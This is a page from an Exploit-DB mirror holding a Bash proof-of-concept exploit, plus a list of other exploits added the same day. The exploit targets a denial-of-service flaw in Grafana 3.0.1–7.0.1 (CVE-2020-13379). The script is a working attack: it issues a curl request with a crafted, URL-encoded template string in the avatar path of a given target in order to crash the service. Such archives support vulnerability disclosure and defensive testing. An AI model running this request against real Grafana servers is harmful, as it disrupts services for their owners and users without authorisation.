exploit-db-mirror/exploits/linux/dos/48638.sh
Offensive Security 1bc852d2af DB: 2020-07-07
7 changes to exploits/shellcodes

Frigate 2.02 - Denial Of Service (PoC)
Fire Web Server 0.1 - Remote Denial of Service (PoC)
Grafana 7.0.1 - Denial of Service (PoC)
File Management System 1.1 - Persistent Cross-Site Scripting
RiteCMS 2.2.1 - Authenticated Remote Code Execution
RSA IG&L Aveksa 7.1.1 - Remote Code Execution
Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution
2020-07-07 05:01:57 +00:00

16 lines
No EOL
495 B
Bash
Executable file

# Exploit Title: Grafana 7.0.1 - Denial of Service (PoC)
# Date: 2020-05-23
# Exploit Author: mostwanted002
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download
# Version: 3.0.1 - 7.0.1
# Tested on: Linux
# CVE : CVE-2020-13379
#!/bin/bash
if [[ $1 != "" ]]; then
curl -I "${1}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D"
else
echo "Usage: grafana-dos.sh <TARGET>. Example: grafana-dos.sh http://localhost:3000"
fi